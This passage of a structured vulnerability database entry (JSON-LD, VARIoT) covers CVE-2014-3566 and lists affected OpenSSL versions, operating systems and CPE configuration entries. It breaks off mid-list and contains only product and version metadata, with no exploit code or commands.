Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201410-1418", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "vios", "scope": "eq", "trust": 1.0, "vendor": "ibm", "version": "2.2.1.6" }, { "model": "enterprise linux server supplementary", "scope": "eq", "trust": 1.0, "vendor": "redhat", "version": "7.0" }, { "model": "database", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "11.2.0.4" }, { "model": "vios", "scope": "eq", "trust": 1.0, "vendor": "ibm", "version": "2.2.2.5" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8q" }, { "model": "vios", "scope": "eq", "trust": 1.0, "vendor": "ibm", "version": "2.2.2.4" }, { "model": "linux", "scope": "eq", "trust": 1.0, "vendor": "debian", "version": "7.0" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0a" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8" }, { "model": "vios", "scope": "eq", "trust": 1.0, "vendor": "ibm", "version": "2.2.3.2" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1h" }, { "model": "aix", "scope": "eq", "trust": 1.0, "vendor": "ibm", "version": "6.1" }, { "model": "vios", "scope": "eq", "trust": 1.0, "vendor": "ibm", "version": "2.2.3.0" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8f" }, { "model": "vios", "scope": "eq", "trust": 1.0, "vendor": "ibm", "version": "2.2.0.10" }, { "model": "vios", "scope": "eq", "trust": 1.0, "vendor": "ibm", "version": "2.2.0.12" }, { "model": "vios", "scope": "eq", "trust": 1.0, "vendor": "ibm", "version": "2.2.3.3" }, { "model": "netbsd", "scope": "eq", "trust": 1.0, "vendor": "netbsd", "version": "6.0.5" }, { "model": "fedora", "scope": "eq", "trust": 1.0, "vendor": "fedoraproject", "version": "20" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8l" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8w" }, { "model": "vios", "scope": "eq", "trust": 1.0, "vendor": "ibm", "version": "2.2.1.7" }, { "model": "vios", "scope": "eq", "trust": 1.0, "vendor": "ibm", "version": "2.2.1.5" }, { "model": "netbsd", "scope": "eq", "trust": 1.0, "vendor": "netbsd", "version": "6.0.2" }, { "model": "vios", "scope": "eq", "trust": 1.0, "vendor": "ibm", "version": "2.2.1.3" }, { "model": "netbsd", "scope": "eq", "trust": 1.0, "vendor": "netbsd", "version": "5.1.3" }, { "model": "vios", "scope": "eq", "trust": 1.0, "vendor": "ibm", "version": "2.2.1.8" }, { "model": "vios", "scope": "eq", "trust": 1.0, "vendor": "ibm", "version": "2.2.1.9" }, { "model": "netbsd", "scope": "eq", "trust": 1.0, "vendor": "netbsd", "version": "5.1" }, { "model": "netbsd", "scope": "eq", "trust": 1.0, "vendor": "netbsd", "version": "6.0.6" }, { "model": "opensuse", "scope": "eq", "trust": 1.0, "vendor": "opensuse", "version": "12.3" }, { "model": "netbsd", "scope": "eq", "trust": 1.0, "vendor": "netbsd", "version": "6.1.3" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8s" }, { "model": "enterprise linux desktop supplementary", "scope": "eq", "trust": 1.0, "vendor": "redhat", "version": "6.0" }, { "model": "netbsd", "scope": "eq", "trust": 1.0, "vendor": "netbsd", "version": "5.1.4" }, { "model": "netbsd", "scope": "eq", "trust": 1.0, "vendor": "netbsd", "version": "6.1.4" }, { "model": "fedora", "scope": "eq", "trust": 1.0, "vendor": "fedoraproject", "version": "19" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0g" }, { "model": "enterprise linux server", "scope": "eq", "trust": 1.0, "vendor": "redhat", "version": "6.0" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8zb" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1e" }, { "model": "suse linux enterprise server", "scope": "eq", "trust": 1.0, "vendor": "novell", "version": "11.0" }, { "model": "mac os x", "scope": "lte", "trust": 1.0, "vendor": "apple", "version": "10.10.1" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8n" }, { "model": "vios", "scope": "eq", "trust": 1.0, "vendor": "ibm", "version": "2.2.3.1" }, { "model": "netbsd", "scope": "eq", "trust": 1.0, "vendor": "netbsd", "version": "5.1.1" }, { "model": "enterprise linux", "scope": "eq", "trust": 1.0, "vendor": "redhat", "version": "5" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1c" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1f" }, { "model": "linux", "scope": "eq", "trust": 1.0, "vendor": "debian", "version": "8.0" }, { "model": "suse linux enterprise server", "scope": "eq", "trust": 1.0, "vendor": "novell", "version": "12.0" }, { "model": "suse linux enterprise desktop", "scope": "eq", "trust": 1.0, "vendor": "novell", "version": "9.0" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0e" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1d" }, { "model": "mageia", "scope": "eq", "trust": 1.0, "vendor": "mageia", "version": "3.0" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8d" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8v" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8e" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8z" }, { "model": "aix", "scope": "eq", "trust": 1.0, "vendor": "ibm", "version": "7.1" }, { "model": "vios", "scope": "eq", "trust": 1.0, "vendor": "ibm", "version": "2.2.1.0" }, { "model": "vios", "scope": "eq", "trust": 1.0, "vendor": "ibm", "version": "2.2.2.3" }, { "model": "enterprise linux server supplementary", "scope": "eq", "trust": 1.0, "vendor": "redhat", "version": "5.0" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8i" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8b" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0k" }, { "model": "enterprise linux server", "scope": "eq", "trust": 1.0, "vendor": "redhat", "version": "7.0" }, { "model": "enterprise linux desktop", "scope": "eq", "trust": 1.0, "vendor": "redhat", "version": "6.0" }, { "model": "opensuse", "scope": "eq", "trust": 1.0, "vendor": "opensuse", "version": "13.1" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0d" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0m" }, { "model": "vios", "scope": "eq", "trust": 1.0, "vendor": "ibm", "version": "2.2.1.4" }, { "model": "vios", "scope": "eq", "trust": 1.0, "vendor": "ibm", "version": "2.2.2.2" }, { "model": "netbsd", "scope": "eq", "trust": 1.0, "vendor": "netbsd", "version": "5.2.2" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1b" }, { "model": "vios", "scope": "eq", "trust": 1.0, "vendor": "ibm", "version": "2.2.0.11" }, { "model": "aix", "scope": "eq", "trust": 1.0, "vendor": "ibm", "version": "5.3" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8o" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1g" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8y" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8p" }, { "model": "vios", "scope": "eq", "trust": 1.0, "vendor": "ibm", "version": "2.2.2.0" }, { "model": "suse linux enterprise desktop", "scope": "eq", "trust": 1.0, "vendor": "novell", "version": "11.0" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0f" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0i" }, { "model": "suse linux enterprise desktop", "scope": "eq", "trust": 1.0, "vendor": "novell", "version": "10.0" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8g" }, { "model": "suse linux enterprise desktop", "scope": "eq", "trust": 1.0, "vendor": "novell", "version": "12.0" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8c" }, { "model": "enterprise linux desktop", "scope": "eq", "trust": 1.0, "vendor": "redhat", "version": "7.0" }, { "model": "fedora", "scope": "eq", "trust": 1.0, "vendor": "fedoraproject", "version": "21" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8u" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1" }, { "model": "suse linux enterprise software development kit", "scope": "eq", "trust": 1.0, "vendor": "novell", "version": "11.0" }, { "model": "enterprise linux workstation supplementary", "scope": "eq", "trust": 1.0, "vendor": "redhat", "version": "6.0" }, { "model": "netbsd", "scope": "eq", "trust": 1.0, "vendor": "netbsd", "version": "6.1.5" }, { "model": "netbsd", "scope": "eq", "trust": 1.0, "vendor": "netbsd", "version": "6.0.1" }, { "model": "netbsd", "scope": "eq", "trust": 1.0, "vendor": "netbsd", "version": "6.0.4" }, { "model": "mageia", "scope": "eq", "trust": 1.0, "vendor": "mageia", "version": "4.0" }, { "model": "netbsd", "scope": "eq", "trust": 1.0, "vendor": "netbsd", "version": "6.0.3" }, { "model": "netbsd", "scope": "eq", "trust": 1.0, "vendor": "netbsd", "version": "6.1.1" }, { "model": "suse linux enterprise software development kit", "scope": "eq", "trust": 1.0, "vendor": "novell", "version": "12.0" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8r" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8k" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8x" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0n" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8a" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0h" }, { "model": "netbsd", "scope": "eq", "trust": 1.0, "vendor": "netbsd", "version": "6.1" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0j" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8m" }, { "model": "netbsd", "scope": "eq", "trust": 1.0, "vendor": "netbsd", "version": "6.0" }, { "model": "enterprise linux workstation", "scope": "eq", "trust": 1.0, "vendor": "redhat", "version": "6.0" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0b" }, { "model": "netbsd", "scope": "eq", "trust": 1.0, "vendor": "netbsd", "version": "6.1.2" }, { "model": "database", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "12.1.0.2" }, { "model": "enterprise linux server supplementary", "scope": "eq", "trust": 1.0, "vendor": "redhat", "version": "6.0" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1a" }, { "model": "vios", "scope": "eq", "trust": 1.0, "vendor": "ibm", "version": "2.2.0.13" }, { "model": "netbsd", "scope": "eq", "trust": 1.0, "vendor": "netbsd", "version": "5.2" }, { "model": "netbsd", "scope": "eq", "trust": 1.0, "vendor": "netbsd", "version": "5.1.2" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0c" }, { "model": "enterprise linux workstation supplementary", "scope": "eq", "trust": 1.0, "vendor": "redhat", "version": "7.0" }, { "model": "enterprise linux desktop supplementary", "scope": "eq", "trust": 1.0, "vendor": "redhat", "version": "5.0" }, { "model": "vios", "scope": "eq", "trust": 1.0, "vendor": "ibm", "version": "2.2.1.1" }, { "model": "vios", "scope": "eq", "trust": 1.0, "vendor": "ibm", "version": "2.2.2.1" }, { "model": "vios", "scope": "eq", "trust": 1.0, "vendor": "ibm", "version": "2.2.3.4" }, { "model": "netbsd", "scope": "eq", "trust": 1.0, "vendor": "netbsd", "version": "5.2.1" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1i" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0l" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8h" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8t" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8j" }, { "model": "enterprise linux workstation", "scope": "eq", "trust": 1.0, "vendor": "redhat", "version": "7.0" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8za" } ], "sources": [ { "db": "NVD", "id": "CVE-2014-3566" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_desktop_supplementary:6.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_desktop:7.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_workstation:7.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server:7.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_supplementary:6.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_workstation_supplementary:6.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_workstation_supplementary:7.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_supplementary:7.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux:5:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_desktop:6.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server:6.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_supplementary:5.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_workstation:6.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_desktop_supplementary:5.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:ibm:aix:5.3:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:ibm:aix:7.1:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:ibm:aix:6.1:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:apple:mac_os_x:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndIncluding": "10.10.1", "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:mageia:mageia:3.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:mageia:mageia:4.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:novell:suse_linux_enterprise_desktop:9.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:novell:suse_linux_enterprise_desktop:11.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:novell:suse_linux_enterprise_desktop:10.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:novell:suse_linux_enterprise_desktop:12.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:novell:suse_linux_enterprise_server:12.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:opensuse:opensuse:12.3:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:novell:suse_linux_enterprise_software_development_kit:11.0:sp3:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:novell:suse_linux_enterprise_software_development_kit:12.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:novell:suse_linux_enterprise_server:11.0:sp3:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:novell:suse_linux_enterprise_server:11.0:sp3:*:*:*:vmware:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:opensuse:opensuse:13.1:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:fedoraproject:fedora:20:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:fedoraproject:fedora:21:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:fedoraproject:fedora:19:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8b:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8m:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0n:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1:beta2:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8c:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0c:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0i:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0:beta1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1h:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8n:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0:beta2:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8p:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0m:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1c:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8e:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8u:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8za:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1g:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8g:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0h:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8k:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8m:beta1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8d:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0:beta3:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0e:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1:beta3:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0f:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8j:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0d:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0j:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8s:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1a:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1:beta1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8l:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1d:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0k:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8r:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8t:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0:beta4:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8z:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8a:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1b:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8zb:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8o:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8q:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8w:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1e:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0:beta5:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1f:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0l:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8v:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8i:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8f:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8y:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0a:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8h:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8x:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1i:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0b:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0g:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:ibm:vios:2.2.0.13:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ibm:vios:2.2.1.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ibm:vios:2.2.0.11:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": 